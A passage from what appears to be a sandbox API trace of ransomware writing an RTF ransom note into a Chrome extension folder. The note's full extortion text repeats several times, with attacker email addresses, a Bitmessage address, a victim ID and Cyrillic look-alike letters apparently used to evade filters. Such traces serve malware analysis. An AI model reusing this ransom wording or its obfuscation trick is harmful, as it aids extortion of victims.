ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.555] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.556] CloseHandle (hObject=0x2c8) returned 1 [0278.556] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0278.556] GetLastError () returned 0x2 [0278.556] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.556] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.556] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.556] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 